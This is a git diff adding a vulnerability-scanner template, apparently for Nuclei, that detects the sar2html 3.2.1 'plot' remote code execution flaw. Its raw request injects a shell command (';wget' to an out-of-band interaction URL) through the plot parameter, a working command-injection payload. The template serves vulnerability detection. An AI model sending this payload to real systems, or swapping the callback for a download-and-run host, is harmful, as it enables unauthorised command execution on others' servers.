diff --git a/vulnerabilities/other/sar2html-rce.yaml b/vulnerabilities/other/sar2html-rce.yaml new file mode 100644 index 0000000000..39a55cbf7f --- /dev/null +++ b/vulnerabilities/other/sar2html-rce.yaml @@ -0,0 +1,26 @@ +id: sar2html-rce + +info: + name: sar2html 3.2.1 - 'plot' Remote Code Execution + author: gy741 + severity: critical + description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a commend injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system. + reference: | + - https://www.exploit-db.com/exploits/49344 + tags: sar2html,rce,oob + +requests: + - raw: + - | + GET /index.php?plot=;wget%20http://{{interactsh-url}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: python-requests/2.18.4 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: keep-alive + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http"